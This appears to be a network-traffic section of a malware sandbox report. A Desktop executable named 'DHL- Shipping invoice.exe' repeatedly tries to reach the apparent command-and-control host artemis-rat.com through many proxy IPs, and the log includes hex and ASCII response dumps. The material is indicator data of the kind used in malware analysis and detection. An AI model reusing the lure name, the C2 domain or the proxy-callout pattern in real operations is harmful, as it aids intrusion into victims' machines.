                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1215192.168.2.45361238.10.90.6806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.281869888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1216192.168.2.451802107.180.90.88238806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.283474922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1217192.168.2.453727104.16.241.204806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.283859015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.372068882 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1218192.168.2.45311251.158.125.135163796484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.346899033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453181028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453330040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.453533888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.546696901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.571441889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.577886105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.577905893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.719424009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1219192.168.2.453688159.65.77.16885856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.346899033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1220192.168.2.453648116.203.28.43806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.348172903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.531641006 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1221192.168.2.453519138.201.21.232344086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.348176003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.641715050 CET24INHTTP/1.1 403 #string


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1222192.168.2.45188837.32.98.16089986484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.349490881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1223192.168.2.453669128.140.26.12806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.349585056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.527978897 CET309INHTTP/1.1 400 Bad Request
                            Server: nginx/1.25.2
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 157
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1224192.168.2.453630103.166.141.74200746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.350183010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1225192.168.2.4536785.252.23.22010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.350614071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.878719091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453576088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1226192.168.2.45369449.13.161.231806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.352564096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1227192.168.2.453696162.144.103.99604156484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.352924109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.859421968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562738895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.765908957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.062705040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.250190020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562741995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062516928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1228192.168.2.453136132.148.128.88607816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.353225946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453180075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.453351974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.453535080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.548939943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:40.572932005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:52.578922987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:16.580918074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:04.719189882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1229192.168.2.453642211.222.252.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.353225946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1230192.168.2.45371637.1.199.18806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.356479883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1231192.168.2.453637219.73.88.167806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.356798887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1232192.168.2.453691177.12.118.160806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.360152006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1233192.168.2.453725173.249.20.16990606484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.360260963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:31.683438063 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1234192.168.2.453692185.101.16.52806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.360498905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1235192.168.2.45288864.227.108.25319086484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.369760990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590008020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1236192.168.2.453738190.96.97.20241536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.369766951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1237192.168.2.45372952.67.10.183806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.371870995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.585933924 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:04.586328030 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1f 24 5a de 15 70 79 28 93 6d 52 80 f0 aa d3 d3 40 52 ea 64 dc 66 78 e8 3e e2 0f 80 41 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e$Zpy(mR@Rdfx>A*,+0/$#('=<5/Uartemis-rat.com#
